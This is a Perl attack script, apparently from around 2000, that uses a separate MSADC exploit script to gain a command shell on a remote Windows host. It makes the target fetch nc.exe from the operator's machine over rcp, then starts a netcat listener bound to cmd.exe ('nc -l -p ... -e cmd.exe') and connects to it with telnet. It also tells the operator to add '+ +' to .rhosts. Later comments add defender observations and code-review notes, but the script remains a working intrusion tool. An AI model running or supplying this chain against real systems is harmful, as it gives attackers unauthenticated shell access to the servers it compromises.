#!/usr/bin/perl
# -- Spawn a command shell on remote host with MSADC
# -- Shouts to RFP of course, [sSh], computer club,
# -- dust puppy II, irc-servers.com, attrition.org,
# -- and hnn.com
# --
# -- rackmount. good fellaz.

# -- This is more or less a dirty script put together
# -- in 5 minutes.

# -- Add "+ +" to your .rhosts file (yes i know this
# -- will make you vulnerable to certain types of shit)
# -- and put nc.exe (netcat) in your home directory.

# -- Usage guard: all three arguments (remote host, operator IP, port) must
# -- be present. On the first missing one, print a usage line that echoes
# -- the arguments already given and exit.
# -- NOTE(review): this is a truthiness test only, so "0" or "" counts as
# -- missing, and nothing checks that the values look like a host name, an
# -- address or a port number. The same values are later interpolated
# -- unquoted into local command lines.
my @placeholders = ('[remote host]', '[my _REAL_ ip]', '[desired port]');
for my $i (0 .. 2) {
  next if $ARGV[$i];
  print join(' ', 'spawncmd.pl', @ARGV[0 .. $i - 1], @placeholders[$i .. 2]), "\n";
  exit;
}

# -- Stage 1: pipe one command line into ./msadc2.pl, pointed at the host
# -- given in $ARGV[0]. msadc2.pl is not part of this file; presumably it is
# -- the MSADC script the header refers to and runs whatever it reads on
# -- stdin on that host -- confirm against that script.
# -- The line written is an rcp that fetches nc.exe from the operator's
# -- machine: the source is spelled <$ARGV[1]>.<USER>:<HOME>/nc.exe from the
# -- local environment, and the destination is "." on the remote side. This
# -- is why the header asks for "+ +" in .rhosts.
# -- Defender view: the server opens an outbound rcp connection (rcp rides
# -- on the rsh service) to an external address and a new nc.exe appears in
# -- the command's working directory. Egress filtering from the web server
# -- stops this step.
# -- NOTE(review): $ARGV[0] is interpolated unquoted into the piped open()
# -- command string, and the results of open()/close() are never checked,
# -- so a missing or failing ./msadc2.pl goes unnoticed here.
open(RHOST, "| ./msadc2.pl -h $ARGV[0]");
print RHOST "rcp -b $ARGV[1].$ENV{'USER'}:$ENV{'HOME'}/nc.exe .\n";
close RHOST;

# -- You may need to increase this depending on the connection
# -- between you and the other host
# -- NOTE(review): this is a fixed five-second wait; nothing verifies that
# -- the earlier nc.exe copy actually completed before the next step runs.
sleep 5;

# -- Stage 2: a second pipe into ./msadc2.pl for the same host. The line
# -- written starts netcat in listen mode on port $ARGV[2] with cmd.exe
# -- attached to the connection.
# -- Defender view: the listener has no authentication, so any client that
# -- can reach the port gets the command shell, presumably with whatever
# -- privileges the exploited service runs under (not shown in this file).
# -- Observable signs are an unexpected listening TCP port and cmd.exe
# -- started by nc.exe. Inbound filtering to the server limits exposure,
# -- but the underlying fix is at the MSADC component that msadc2.pl targets.
# -- NOTE(review): as with the first pipe, open()/close() are unchecked.
open(RHOST, "| ./msadc2.pl -h $ARGV[0]");
print RHOST "nc -l -p $ARGV[2] -e cmd.exe\n";
close RHOST;

# -- After finished connecting you can take "+ +" out of
# -- your .rhosts file.
# -- NOTE(review): while "+ +" is in place the operator's own account
# -- trusts r-service requests from any host and user, which is the
# -- exposure the header warns about.

# -- Connect to the listener started on the remote host using the local
# -- telnet client. The session is plain TCP: unencrypted and
# -- unauthenticated, so everything typed and returned is visible on the
# -- wire.
# -- NOTE(review): single-string system() goes through command parsing with
# -- $ARGV[0] and $ARGV[2] interpolated unquoted, and its return value is
# -- ignored, so a failed connection is not reported by this script.
system("telnet $ARGV[0] $ARGV[2]");

#                    www.hack.co.za              [2000]#
# EOF 
